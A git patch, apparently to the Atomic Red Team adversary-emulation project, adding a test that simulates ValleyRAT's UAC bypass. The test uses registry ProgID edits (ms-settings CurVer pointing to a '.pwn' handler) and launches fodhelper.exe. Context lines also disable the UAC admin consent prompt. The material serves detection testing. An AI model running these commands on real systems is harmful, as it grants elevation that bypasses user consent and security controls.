From df25f7e1ffb203ecbb15e62550feb72b61cce1e8 Mon Sep 17 00:00:00 2001 From: Br3akp0int <26181693+tccontre@users.noreply.github.com> Date: Tue, 24 Sep 2024 17:30:06 +0200 Subject: [PATCH] Uac bypassed via prog i ds (#2940) * ShrinkLocker PIN,TPM Bitlocker Registry Modification * Revert "ShrinkLocker PIN,TPM Bitlocker Registry Modification" * Update T1548.002.yaml --------- Co-authored-by: Carrie Roberts --- atomics/T1548.002/T1548.002.yaml | 21 ++++++++++++++++++++- 1 file changed, 20 insertions(+), 1 deletion(-) diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 24941299..9c67405d 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -692,4 +692,23 @@ atomic_tests: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f cleanup_command: | reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 /f - name: command_prompt \ No newline at end of file + name: command_prompt + +- name: UAC bypassed by Utilizing ProgIDs registry. + auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08 + description: | + This atomic designed to simulate the UAC bypassed made by ValleyRAT by adding customized ProgIDs registry entry. + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f + + reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f + + echo Triggering fodhelper.exe for potential privilege escalation... + start fodhelper.exe + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f + reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f + name: command_prompt